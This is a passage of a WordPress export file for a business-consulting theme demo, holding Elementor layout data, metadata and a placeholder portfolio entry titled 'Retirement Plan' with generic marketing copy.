management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"85383ad","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"1342689","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0503cc8","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"72318ac","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"028e431","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"f895d31","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"0b6b8c9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"ee63c99","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1218]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[778]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[thumb_size]]></wp:meta_key>
		<wp:meta_value><![CDATA[double_wh]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Retirement Plan</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/retirement-plan/</link>
		<pubDate>Fri, 11 Sep 2020 04:29:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=797</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>July 02, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>797</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:29:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:29:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[retirement-plan]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"60e1ac27","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4c36af66","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"4e2f2262","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1e19bf7","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"5fceea31","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"365148c8","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"56ce4a9","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"62b7915","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7940adfb","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2711c64d","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"10bfada8","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"366a5c36","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"229cd6e2","elType":"widget","settings":{"editor":"<p>July 02, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"460b2861","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3bd9565","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"1171a95e","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"671086a6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6801bcf2","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"2f9b511c","elType":"section","settings":[],"elements":[{"id":"372968ca","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7614d162","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"28ed8cc8","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1e2785ff","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"1c0395bc","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"655cc647","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"243489a7","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"211b5b","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"2d352051","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"337d4b6","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"4a18c5dc","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"6c914bd","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"10c05b0b","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"448e3e72","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"3613c69","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"57fd56fa","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"4612c606","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"53a863d2","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"360d2032","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"6378b9d3","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"6de6d883","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"19a88f02","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"183f043f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"5e8c8663","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[800]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
